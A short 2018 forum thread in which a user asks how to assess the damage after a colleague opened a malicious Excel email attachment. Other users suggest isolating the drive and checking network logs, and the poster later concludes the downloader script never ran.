Excel Email Virus Damage Control

Discussion in 'Networking & Security' started by mr_zen256, May 7, 2018.

  1. mr_zen256

    mr_zen256 2[H]4U

    Messages:
    2,162
    Joined:
    Dec 29, 2005
    Hi all - A work colleague has inadvertently opened a malicious Excel email document and I am trying to gauge what kind of damage may have been caused and any further measures we need to take. The colleague has already had a good grilling and a crash course in email security 101.

    When they opened the file, excel listed documents and files on the persons PC. I didn't get a chance to see this document while it was open so am unable to elaborate on that further.

    We have scanned the file locally with Malwarebytes and it didn't report and threats. When uploading the document to virustotal.com, only 1 of 59 engines reported a threat "UDS: DangerousObject.Multi.Generic"

    Any suggestions on how to determine what data / info may have been breached?
     
  2. Vengance_01

    Vengance_01 [H]ardness Supreme

    Messages:
    5,525
    Joined:
    Dec 23, 2001
    Pull the drive and then put it into a machine that isolated from the network so you can do some testing without worry.
     
    TeK-FX likes this.
  3. Dead Parrot

    Dead Parrot [H]ard|Gawd

    Messages:
    1,782
    Joined:
    Mar 4, 2013
    If you have a edge security device, pull logs and see if that workstation sent data offsite. If data was sent out of the building, depending on the data on that person's PC, you may have to file a data breech report with the local authorities and contact your insurance company about setting up identity monitoring services for customers whose data was sent out.

    If you got lucky and nothing left the building, count your blessings and then ask why the email scanner didn't pickup and terminate the malicious document.
     
    Vengance_01 likes this.
  4. mr_zen256

    mr_zen256 2[H]4U

    Messages:
    2,162
    Joined:
    Dec 29, 2005
    After further investigation, it looks like the Excel script was a downloader. Thankfully the script was not triggered so no malware was able to infect the workstation. I would like to think that Malwarebytes would have blocked it if it had managed to run.

    Definitely a close shave.